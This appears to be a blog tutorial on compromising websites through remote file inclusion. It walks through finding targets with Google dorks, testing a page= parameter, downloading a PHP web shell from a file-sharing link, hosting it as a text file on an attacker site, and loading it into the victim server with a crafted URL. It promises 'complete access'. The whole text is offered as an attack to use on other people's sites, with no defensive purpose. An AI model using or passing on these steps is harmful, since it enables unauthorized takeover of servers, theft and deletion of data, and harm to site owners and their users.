1. Searching for RFI vulnerability
The valnerability is ussually found in websites that have a url navigation that is similar to;
- www.victimwebsite.com/index.php?page=something
This can be found by the use of google dorks.. e.g inurl:index.php?page=
2. Testing for RFI vulnerability
After targeting a website, you need to make sure that its realy vulnerable to this type of attack by testing using:
- www.victimwebsite.com/index.php?page=http://www.google.com/?
Press enter and if the google home page appears instead of the victim's website, then it is vulnerable to RFI
3. Gaining Access to the server
Now you need to execute your own script on the victim's webserver with the help of a shell. Shells are scripts that allow a hacker to view directories of a server, viewing files, deleting files and letting you run commands.
DOWNLOAD SHELL: http://www.mediafire.com/file/d6jafoo2iafsaj4/shell.php
Now upload the shell to any webhost (hacker's website) and get the url of that
e.g www.hackerwebsite.com/shell.txt
You need to upload the shell as a text file (shell.txt) instead of shell.php. The reason is that if you upload it as ''shell.php'', its going to execute on the hacker's website instead of the victim's website,. get my point?
Now you need to hook up your victim's server to your shell by replacing the google url with your shell url so that it looks like this;
www.victimwebsite.com/index.php?page=http://hackerwebsite.com/shell.txt
Hit enter!!! and its game over.... you have complete access to the victim's server and you can do anything with it... :P
0 comments:
Post a Comment